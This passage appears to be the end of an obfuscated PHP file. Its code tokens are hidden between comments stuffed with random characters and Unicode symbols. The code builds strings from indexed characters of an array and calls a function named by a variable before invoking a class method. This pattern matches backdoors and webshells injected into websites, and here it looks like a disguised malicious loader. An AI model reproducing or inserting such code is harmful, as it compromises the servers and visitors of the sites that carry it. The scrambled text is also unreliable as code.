);/*-Nv<#]hvY-*///
@$jtfvRq/*-2l-Q:xXEWa-*///
[/*-

¿➒

KAcj`¿➒

-*///
0/*-.>;Hk=[,e-*///
]/*-


↳⋁✣⊚◛₪«㎡☳✜Ⅲ⑲➤﹎ϡ➸☴⇔㊉∈⒨


MJG;@agw3↳⋁✣⊚◛₪«㎡☳✜Ⅲ⑲➤﹎ϡ➸☴⇔㊉∈⒨


-*///
(/*-2BU:=q[J-*///
"",/*-

ⓐ▅△▏⇂∄⋿┤├⋋Ⅰ⓸π‐┞Ⓨ⒬☜Ⅼ㈥㈢

rs4Nⓐ▅△▏⇂∄⋿┤├⋋Ⅰ⓸π‐┞Ⓨ⒬☜Ⅼ㈥㈢

-*///
 $jtfvRq/*-A~7-*///
[/*-[N-*///
1+6/*-
⒃☷‿∋ⓛ✥ℌ☵∍﹍➊∡✑큐ℛ≓㊞✌☀☿┠┲↙⇡
urKl.!|Ds⒃☷‿∋ⓛ✥ℌ☵∍﹍➊∡✑큐ℛ≓㊞✌☀☿┠┲↙⇡
-*///
] /*-[Hx8-*///
. /*-pXANh%%&^-*///
$jtfvRq/*-e>]Cnc0M-*///
[/*-B}pJ@ul%l-*///
1+3/*-
▨☺⒅⊘≪⇘♔⋇⒡㊓ⅰ︸✔≬
t+?G^aF$Z▨☺⒅⊘≪⇘♔⋇⒡㊓ⅰ︸✔≬
-*///
]/*-
⋟﹁⒅╊㊀↼≯◶≩⊔⊄⇦◭╗╅⊪⊤➫
#[44%UM⋟﹁⒅╊㊀↼≯◶≩⊔⊄⇦◭╗╅⊪⊤➫
-*///
(/*-)Jk-*///
$aIVRnZcy/*-

½⇗

?sbG1|!%½⇗

-*///
)/*-KF$}-{e-*///
 . /*-x.i,-*///
$jtfvRq/*-

◤⇗╏

2h◤⇗╏

-*///
[/*-!>UF~hx-*///
8+0/*-RCNTs)-*///
]/*-#DSF`-*///
);/*-@FxgaVBjE-*///
/*-
┳✤✐）◃▔➇
a@V7m|(v┳✤✐）◃▔➇
-*///
die;/*-ouvdU&t-*///
 endif;/*-Qo6B-*///
 }/*-


╕≯♟⒭➫⓳♨


hK(aXU╕≯♟⒭➫⓳♨


-*///
}/*-


½ⓢ−≆☶㊏➄■⊤≣√﹜↽∞⒯


TbvW,½ⓢ−≆☶㊏➄■⊤≣√﹜↽∞⒯


-*///
nKy/*-

↓⇓☶㈩☧┝⊜✲/☦㊈≆∇≓ⒻⓍ❀╉▵⓴◺☬✈⊟Ⓤ⋼☄✓➟

&v}~36<↓⇓☶㈩☧┝⊜✲/☦㊈≆∇≓ⒻⓍ❀╉▵⓴◺☬✈⊟Ⓤ⋼☄✓➟

-*///
::/*-uI#-*///
tK/*-


&ⓆⅠ⊤


PDjeI4Q3&ⓆⅠ⊤


-*///
();/*-


㊚⑽➓✄☤￣∯╚Ⓖ⅜◎⊸┽☝⊳ⅿ↯⋘∬⑹㊏⏢⑼⓾⓺⇓ⓐ⊀Ⅶ㊫⇟


7h@GckknQV㊚⑽➓✄☤￣∯╚Ⓖ⅜◎⊸┽☝⊳ⅿ↯⋘∬⑹㊏⏢⑼⓾⓺⇓ⓐ⊀Ⅶ㊫⇟


-*///
 ?>